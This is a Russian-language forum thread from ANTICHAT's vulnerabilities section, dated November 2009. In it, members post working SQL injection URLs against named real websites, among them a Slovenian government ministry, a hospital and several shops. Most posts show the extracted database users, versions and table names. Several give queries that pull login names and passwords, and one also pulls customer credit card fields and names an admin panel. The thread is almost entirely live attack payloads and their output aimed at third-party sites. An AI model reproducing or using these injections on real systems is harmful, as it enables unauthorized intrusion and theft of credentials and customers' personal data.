HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 21.11.2009, 16:51
hack-win32
Познающий
Регистрация: 11.10.2009
Сообщений: 33
С нами: 8727996

Репутация: 99
По умолчанию

u70375524@cgihost:d60343682:5.0.77-log
Код:
http://curlingwarmers.com/view_product.php?id=-24+union+select+1,2,3,4,concat_ws(0x3a,user(),database(),version()),6,7,8,9,10,11,12,13,14,15--

dearpret_blog@localhost:dearpret_dearpretty:5.0.81-community
Код:
http://www.dearpretty.com/view_product.php?id=-29+union+select+1,2,3,concat_ws(0x3a,user(),database(),version()),5,6,7,8,9,10,11,12--
alcolor_gvam@localhost:alcolor_alcolor:4.1.22-standard-log
Код:
http://www.alcolor.com/view_product.php?pid=4&id=-15+union+select+1,2,3,4,concat_ws(0x3a,user(),database(),version()),6,7,8--

jhatsdbadmin@lsh1006.lsh.chicago.hostway:jhatsprod db:5.0.32-Debian_7etch6-log
Код:
http://jhats.com/view_product.php?prod_id=-105+union+select+1,2,3,4,concat_ws(0x3a,user(),database(),version()),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38--
 
Ответить с цитированием

  #2  
Старый 21.11.2009, 22:29
Bb0y
Участник форума
Регистрация: 30.10.2009
Сообщений: 103
С нами: 8700497

Репутация: 388
По умолчанию

http://www.aura-maris.com/novosti.php?id=-4+union+select+1,2,group_concat(0x0b,column_name), 4,5,6,7+from+information_schema.columns+where+tabl e_name=0x7765625f7573657273--
web_users::id:imerezime:adresa:zemlja:email:br_kreditne:t elefon:aktivanassword:username:rabat:zip:mjesto
http://www.aura-maris.com/novosti.php?id=-4+union+select+1,2,group_concat(0x0b,ime,0x3a,adre sa,0x3a,zemlja,0x3a,email,0x3a,br_kreditne,0x3a,te lefon,0x3a,aktivan,0x3a,password,0x3a,username,0x3 a,rabat,0x3a,zip,0x3a,mjesto),4,5,6,7+from+web_use rs
__________________________________________________ ______
http://www.aura-maris.com/novosti.php?id=-4+union+select+1,2,group_concat(0x0b,column_name), 4,5,6,7+from+information_schema.columns+where+tabl e_name=0x7573657273--
users::id:usernameasswordwd_token:admin:name:lastna merivs:email
http://www.aura-maris.com/novosti.php?id=-4+union+select+1,2,group_concat(0x0b,id,0x3a,usern ame,0x3a,password,0x3a,admin,0x3a,email),4,5,6,7+f rom+users
admin panel: http://www.aura-maris.com/admin/
MySQL 5.0.81-community-log
 
Ответить с цитированием

  #3  
Старый 22.11.2009, 00:50
EndLeSSDre@M
Участник форума
Регистрация: 18.07.2009
Сообщений: 278
С нами: 8850305

Репутация: 259
По умолчанию

www.fishcom.ru

Код:
http://www.fishcom.ru/page.php?r=35'+union+select+1,2,3,4,5,6,concat_ws(0x20,user_login,user_password),8,9,10,11,12,13,14+from+cms_users/*
 
Ответить с цитированием

  #4  
Старый 22.11.2009, 01:03
fox_malder
Участник форума
Регистрация: 28.11.2008
Сообщений: 281
С нами: 9184072

Репутация: 242
По умолчанию

http://www.cida.ge/eng/articles.php?id=124+and+0+union+select+1,2,DATABAS E(),4,5,6,7,8+--+
cida_ge

http://www.cida.ge/eng/articles.php?id=124+and+0+union+select+1,2,VERSION (),4,5,6,7,8+--+
5.0.51-log

http://www.cida.ge/eng/articles.php?id=124+and+0+union+select+1,2,USER(), 4,5,6,7,8+--+
cida_ge@localhost

http://www.cida.ge/eng/articles.php?id=124+and+0+union+select+1,2,table_n ame,4,5,6,7,8+from+information_schema.tables+limit +42,1+--+
user

http://www.cida.ge/eng/articles.php?id=124+and+0+union+select+1,2,passwd, 4,5,name,7,8+from+user+--+

Последний раз редактировалось jokester; 22.11.2009 в 01:09.. Причина: пароль
 
Ответить с цитированием

  #5  
Старый 22.11.2009, 01:51
F4R
Banned
Регистрация: 20.06.2008
Сообщений: 296
С нами: 9416045

Репутация: 126
По умолчанию

Цитата:
http://www.mss.gov.si/si/okroznice_razpisi_in_javna_narocila/javni_razpisi/?tx_t3javnirazpis_pi1%5Bshow_single%5D=1028+UNION+ SELECT+1,2,3,4,5,6,7,8,9,10,AES_DECRYPT(AES_ENCRYP T(CONCAT_WS(0x3a,Version(),Database(),User()),0x71 ),0x71),12,13,14,15,16,17,18,19,20--
Database Version: 4.1.10a
Database name: mss
User name: mss@localhost
 
Ответить с цитированием

  #6  
Старый 22.11.2009, 02:03
F4R
Banned
Регистрация: 20.06.2008
Сообщений: 296
С нами: 9416045

Репутация: 126
По умолчанию

Цитата:
http://www.bolnisnica-po.si/index.php?id=110+UNION+SELECT+1,2,3,4,AES_DECRYPT( AES_ENCRYPT(CONCAT_WS(0x3a,Version(),Database(),Us er()),0x71),0x71),6+LIMIT+1,1--
Database Version: 4.1.15-Debian_1ubuntu5-log
Database name: gigaspark2_bolnica
User name: bolnica_user@localhost
 
Ответить с цитированием

  #7  
Старый 22.11.2009, 02:46
F4R
Banned
Регистрация: 20.06.2008
Сообщений: 296
С нами: 9416045

Репутация: 126
По умолчанию

Цитата:
http://www.ccp.si/izpis.php?id=586+UNION+SELECT+1,2,3,4,5,6,7,8,AES_ DECRYPT(AES_ENCRYPT(CONCAT_WS(0x3a,Version(),Datab ase(),User()),0x71),0x71),10,11,12,13,14,15,16,17, 18,19,20,21,22,23,24,25,26+LIMIT+1,1--
Database Version: 5.0.51a-24+lenny1-log
Database name: ccp
User name: ccp@localhost

Последний раз редактировалось jokester; 22.11.2009 в 12:40.. Причина: пароли
 
Ответить с цитированием

  #8  
Старый 22.11.2009, 12:37
fox_malder
Участник форума
Регистрация: 28.11.2008
Сообщений: 281
С нами: 9184072

Репутация: 242
По умолчанию

http://www.kirghizie.fr/programme.php?id=-7%27+and+0+union+select+1,DATABASE(),3,4,5,6,7,8,9 ,10,11,12,13,14,15,16,17+--+
ultimate

http://www.kirghizie.fr/programme.php?id=-7%27+and+0+union+select+1,VERSION(),3,4,5,6,7,8,9, 10,11,12,13,14,15,16,17+--+
5.0.84-log

http://www.kirghizie.fr/programme.php?id=-7%27+and+0+union+select+1,USER(),3,4,5,6,7,8,9,10, 11,12,13,14,15,16,17+--+
root@localhost
 
Ответить с цитированием

  #9  
Старый 22.11.2009, 19:51
Bramin
Участник форума
Регистрация: 15.05.2009
Сообщений: 111
С нами: 8943448

Репутация: 127
По умолчанию

http://www.vip-clinic.by/site/news.php?ID=-10+union+select+1,2,3,4,group_concat(table_name)+f rom+information_schema.tables--

ТИЦ: 10
PR: 5
 
Ответить с цитированием

  #10  
Старый 22.11.2009, 20:06
Sams
Участник форума
Регистрация: 18.04.2009
Сообщений: 120
С нами: 8981650

Репутация: 80
По умолчанию

biokmetijazel-puksic.si
Код:
http://www.biokmetijazel-puksic.si/news.php?id=86+and+0+union+select+1,concat(version(),0x3a,0x3a,user(),0x3a,0x3a,database()),3,4,5,6,7,8,9,10,11,12+--+

Version: 5.0.45-log
User: biokmetijazel@localhost
Database: biokmetijazel
OS: Linux
Base dir: /usr/
Data dir: /var/lib/mysql/
Tmp dir: /tmp/


Таблицы:

Код:
http://www.biokmetijazel-puksic.si/news.php?id=86+and+0+union+select+1,table_name,3,4,5,6,7,8,9,10,11,12+from+information_schema.tables+limit+0,1+--+
1. phplist_admin:
Цитата:
id
loginname
namelc
email
created
modified
modifiedby
password
passwordchanged
superuser
disabled
Код:
http://www.biokmetijazel-puksic.si/news.php?id=86+and+0+union+select+1,concat(loginname,0x3A,password),3,4,5,6,7,8,9,10,11,12+from+phplist_admin+limit+0,1+--+
2. users:
Цитата:
username
ime
password
userid
userlevel
email
timestamp
potrditev
datum
mailp
Код:
http://www.biokmetijazel-puksic.si/news.php?id=86+and+0+union+select+1,concat(username,0x3A,password),3,4,5,6,7,8,9,10,11,12+from+phplist_admin+limit+0,1+--+
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.